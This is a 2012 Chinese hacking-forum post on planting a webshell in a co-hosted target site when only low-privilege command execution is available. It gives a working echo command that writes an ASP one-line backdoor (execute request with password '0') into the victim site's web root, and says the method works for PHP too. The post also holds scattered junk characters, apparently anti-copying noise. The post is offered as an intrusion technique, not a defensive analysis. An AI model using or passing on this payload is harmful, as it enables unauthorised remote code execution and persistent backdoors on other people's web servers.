找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1881|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。6 G( ?  \' r# R$ ~3 M9 E. b! U
/ `! K& b) l4 ]
命令格式
+ |/ g! `9 d( t
: g" c/ E9 W. {Echo 语句 >目标站绝对目录
/ \7 Z+ X% L, Y7 x* S4 y1 \7 \" ~: T8 j$ B( j) o; [- M
例如: 3 B, x; e  G! n

( N7 |" P! `7 \echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
' ]: t  D! @8 D1 C: k$ c
3 l1 g$ A" N0 l- t. s' j$ G这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
* Y. t8 y. m" H% f1 H- P" H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表